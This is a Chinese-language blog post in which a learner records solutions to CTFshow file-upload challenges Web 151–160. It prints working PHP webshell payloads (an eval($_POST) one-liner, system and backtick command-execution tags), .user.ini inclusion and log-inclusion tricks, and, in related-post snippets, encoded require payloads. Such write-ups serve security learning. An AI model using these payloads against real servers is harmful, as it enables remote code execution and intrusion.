CTFSHOW 文件上传(学习记录)

最新推荐文章于 2024-05-12 10:27:45 发布
最新推荐文章于 2024-05-12 10:27:45 发布
阅读量577 收藏 2
点赞数
分类专栏: CTF 学习记录 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45742511/article/details/113823186
版权

目录

Web 151

前端验证,抓包修改数据OK

Web 152

直接上传一句话木马,连接即可

Web 153

参考链接:

文件上传漏洞——.htaccess和.user.ini配置文件的应用

因为该环境是nginx搭建的,所以.htaccess不能使用。

Web 154

文件内容不能有php,可以双写绕过。

Web 155

采用php短标签:php短标签

Web 156

[ ] 被过滤,使用{ }进行代替。

<? eval($_POST{
   ctfshow});?>

Web 157

在此前基础上过滤了 {}
结合命令执行,构造图片木马:

<?=(system('nl ../f*.p*'))?>

查看页面源代码即可。

Web 158

同上一关,可以结合命令执行尝试不同的代码。

Web 159

可能过滤了一些命令执行函数吧,使用 `` 包裹就好:

<?=`nl ../f*.p*`?>

Web 160

接下来的题,边做边写。

先上传.user.ini:
在这里插入图片描述
然后上传ctf.png,木马多试一试,尝试使用之前的方法,发现空格被过滤,使用一些空格绕过的方法,报错:
在这里插入图片描述

既然是文件包含,尝试使用日志包含:
在这里插入图片描述
这里直接包含日志文件发现不行,查看师傅们的方法:学到了学到了。

<?=include"/var/lo".
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFshow 文件上传 web161
Kradress的博客
02-15 391
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 在上传.user.ini发现失败,可能对文件内容进行检测 在多次尝试后,发现文件类型为image/png,文件头加上GIF89a而且文件不能太小,要多加点内容 其他都和上题一样 .user.ini GIF89a auto_prepend_file=shell.png shell.png 记得url解码 GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0
CTFshow 文件上传 web162
Kradress的博客
02-15 2062
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
2024年网络安全最全CTFshow web入门——文件上传_ctfshow文件上传(1),网络安全事件分发机制及设计思路
2401_84264727的博客
05-11 980
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。要修改的图片的路径,1.png是使用的文件,可以不存在。
文件上传漏洞(全网最详细)
2201_75362610的博客
01-12 1205
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
ctfshow-web入门 文件上传篇部分题解
volcano的博客
03-06 6564
ctfshow文件上传web151-152web153(.user.ini绕过).user.iniweb154-155(短标签绕过+.user.ini绕过)短标签绕过web156web157-159web160(日志包含绕过)web161web162-163(session文件包含+条件竞争)条件竞争web164(png图片二次渲染绕过)web165(jpg图片二次渲染绕过)web166web167(.htaccess) 文件上传 web151-152 这两题步骤是一样的,先写一个一句话: <?ph
CTFSHOW(命令执行)【学习记录
ximo的博客
01-27 2270
学习记录web29web30web31 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 对 flag 进行了过滤: 姿势学习: c=system('cat f*'); #正则表达式 c=
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFSHOW web164 PNG二次渲染脚本(生成图片马)
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名为"2.png"的文件。另外,这段代码还暗藏了一个木马内容,可以通过GET请求调用POST请求中的参数作为...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web162-170_ctfshow162题(1),2024年最新2024网络安全春招面试经历
2401_84164503的博客
04-09 809
这就给了我们一种思路:我们把原来的图片和二次渲染后的图片进行对比,找到不改变的地方,把我们的后门代码植入到这个地方中,再进行上传。参考贴脚本:php$y += 3) {?这脚本生成的后门是用get方式传递system post传递命令运行脚本,生成了一个png,上传成功。注意:这里图片的地址是用php代码包含的。所以才可以执行php代码。如果不是这样,而是直接用路径显示,我们就需要使用.user.ini文件。
ctfshow web162-170
m0_74057302的博客
03-13 1769
往事暗沉不可追,来日之路光明灿烂
2024年ctfshow web162-170_ctfshow162题(1),网络安全模块化面向接口编程
最新发布
2401_84239625的博客
05-12 358
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。二次渲染:在我们上传文件后,网站会对图片进行二次处理(格式、尺寸要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片并放到网站对应的标签进行显示。这就给了我们一种思路:我们把原来的图片和二次渲染后的图片进行对比,找到不改变的地方,把我们的后门代码植入到这个地方中,再进行上传。
ctfshow web162-170_ctfshow162题(1),【一篇文章搞懂
m0_60635637的博客
04-05 702
这脚本生成的后门是用get方式传递system post传递命令运行脚本,生成了一个png,上传成功。注意:这里图片的地址是用php代码包含的。所以才可以执行php代码。如果不是这样,而是直接用路径显示,我们就需要使用.user.ini文件。
ctf php168,CTF—攻防练习之HTTP—PUT上传漏洞
weixin_39830225的博客
04-01 109
主机:192.168.32.152靶机:192.168.32.159中间件PUT漏洞包括apache,tomcat,IIS等中间件设置支持的HTTP方法(get,post,head,delete,put等)每一个开放了HTTP方法都有其对应功能,PUT方法可以直接从客户机上传文件到服务器,如果中间件开放了HTTP中的PUT方法,那么就可以利用上传webshell到服务器对应目录扫描靶机端口: 然后...
ctfshow-web153(文件上传)
m0_62094846的博客
01-17 1871
.user.ini 原理: 指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);这两个设置的区别只是在于auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)所以要求当前目录必须要有php文件,巧合的是这题upload目录下有个index.php所以这种方式是可以成功的。 注:auto_append_
ctfshow文件上传
09-02
4. 文件包含漏洞:目标服务器存在文件包含漏洞时,您可以通过上传一个恶意文件,然后在适当的条件下触发该文件被包含,从而执行您所需要的操作。 需要注意的是,在实际的CTF比赛或者演练中,上传文件是一个涉及安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值